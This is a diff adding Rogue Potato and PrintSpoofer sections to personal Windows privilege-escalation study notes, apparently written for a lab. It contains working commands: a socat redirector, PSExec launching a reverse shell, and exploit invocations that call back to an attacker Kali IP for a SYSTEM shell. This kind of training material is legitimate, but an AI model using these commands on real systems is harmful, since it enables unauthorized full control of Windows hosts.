ajith737/Notes/Privileage Escalation/Windows_PrivEsc.md

 Alternative Data Stream: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

+### 12.4 Rogue Potato
+1. Set up a socat redirector on Kali, forwarding Kali port 135 to port 9999 on Windows: `sudo socat tcp-listen:135,reuseaddr,fork tcp:MACHINE_IP:9999`
+2. Start a listener on Kali.
+Simulate getting a service account shell by logging into RDP as the admin user, starting an elevated command prompt (right-click -> run as administrator) and using PSExec64.exe to trigger the reverse.exe executable you created with the permissions of the "local service" account: `C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe`
+3. Start another listener on Kali.
+4. Now, in the "local service" reverse shell you triggered, run the RoguePotato exploit to trigger a second reverse shell running with SYSTEM privileges (update the IP address with your Kali IP accordingly): `C:\PrivEsc\RoguePotato.exe -r 10.10.10.10 -e "C:\PrivEsc\reverse.exe" -l 9999`

+### 12.5 PrintSpoofer
+1. Start a listener on Kali.
+Simulate getting a service account shell by logging into RDP as the admin user, starting an elevated command prompt (right-click -> run as administrator) and using PSExec64.exe to trigger the reverse.exe executable you created with the permissions of the "local service" account:   `C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe`
+2. Start another listener on Kali.
+3. Now, in the "local service" reverse shell you triggered, run the PrintSpoofer exploit to trigger a second reverse shell running with SYSTEM privileges (update the IP address with your Kali IP accordingly): `C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i`

 ## 13. getsystem <a name="getsystem"></a>
 In metasploit meterpreter run `getsystem` it will try to escalate privileges.